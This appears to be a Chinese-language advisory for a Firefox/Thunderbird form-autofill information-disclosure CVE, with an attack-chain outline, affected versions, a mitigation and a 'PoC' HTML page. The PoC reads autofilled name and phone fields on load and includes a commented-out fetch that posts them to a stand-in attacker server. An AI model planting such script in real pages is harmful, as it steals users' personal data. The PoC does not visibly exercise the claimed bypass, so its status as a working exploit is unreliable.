CVE-2026-6765 Firefox/Thunderbird表单自动填充信息泄露漏洞

漏洞信息

漏洞编号

CVE-2026-6765

漏洞类型

信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Mozilla Firefox, Mozilla Firefox ESR, Mozilla Thunderbird

漏洞概述

CVE-2026-6765 是Mozilla Firefox及Thunderbird表单自动填充组件中的信息泄露漏洞。由于组件处理数据的机制存在缺陷，攻击者无需用户交互或特定权限即可利用网络向量窃取敏感数据。此漏洞影响多个旧版本，已在Firefox 150、Firefox ESR 140.10及相关Thunderbird版本中修复。

技术细节

该漏洞源于Form Autofill组件在处理和存储用户敏感数据时，未能正确实施严格的数据隔离与访问控制机制。具体而言，组件在特定渲染条件下，可能会绕过同源策略（SOP）限制，允许恶意网页脚本读取本应受保护的自动填充数据。攻击者可利用此缺陷，精心构造包含恶意代码的Web页面。由于CVSS向量显示无需用户交互（UI:N）且无需认证（PR:N），攻击者仅需诱导受害者访问该恶意链接，浏览器在解析页面时便会自动触发漏洞逻辑，将本地存储的个人隐私信息（如姓名、地址、电话号码等）泄露给攻击者控制的服务器。这种利用方式隐蔽性强，用户难以察觉，对个人隐私安全构成严重威胁。

攻击链分析

STEP 1

步骤1：环境准备

攻击者搭建恶意网站，并在页面中嵌入针对Form Autofill组件漏洞的恶意脚本代码。

STEP 2

步骤2：诱导访问

攻击者通过网络钓鱼、恶意广告等方式诱导受害者使用存在漏洞的Firefox或Thunderbird版本访问该恶意网站。

STEP 3

步骤3：触发漏洞

受害者的浏览器加载恶意页面时，由于无需用户交互（UI:N），页面中的脚本自动利用Form Autofill组件的缺陷读取本地隐私数据。

STEP 4

步骤4：数据回传

浏览器将窃取到的敏感表单信息（如姓名、地址等）发送至攻击者控制的服务器，完成信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Proof of Concept for CVE-2026-6765 Information Disclosure -->
<!-- This PoC simulates reading autofill data -->
<!DOCTYPE html>
<html>
<head>
    <title>CVE-2026-6765 PoC</title>
</head>
<body>
    <h1>Testing Autofill Information Disclosure</h1>
    <p>This page attempts to read autofill data.</p>
    
    <form id="exploitForm">
        <input type="text" name="fullname" autocomplete="name">
        <input type="tel" name="phone" autocomplete="tel">
    </form>

    <script>
        // Attempt to trigger the vulnerability
        window.onload = function() {
            try {
                const inputs = document.querySelectorAll('input');
                let leakedData = {};
                
                inputs.forEach(input => {
                    if(input.value) {
                        leakedData[input.name] = input.value;
                    }
                });

                if (Object.keys(leakedData).length > 0) {
                    console.log("[+] Potential Data Leak Detected:", leakedData);
                    // Simulate exfiltration
                    // fetch('https://attacker-controlled-server/log', {
                    //    method: 'POST',
                    //    body: JSON.stringify(leakedData)
                    // });
                    alert("Data leaked: " + JSON.stringify(leakedData));
                } else {
                    console.log("[-] No data leaked or exploit failed.");
                }
            } catch (error) {
                console.error("Exploit error:", error);
            }
        };
    </script>
</body>
</html>

影响范围

Mozilla Firefox < 150

Mozilla Firefox ESR < 140.10

Mozilla Thunderbird < 150

Mozilla Thunderbird < 140.10

防御指南

临时缓解措施

如果无法立即升级，建议用户暂时禁用浏览器的Form Autofill（表单自动填充）功能，并避免在不信任的网站上输入或保存个人敏感信息。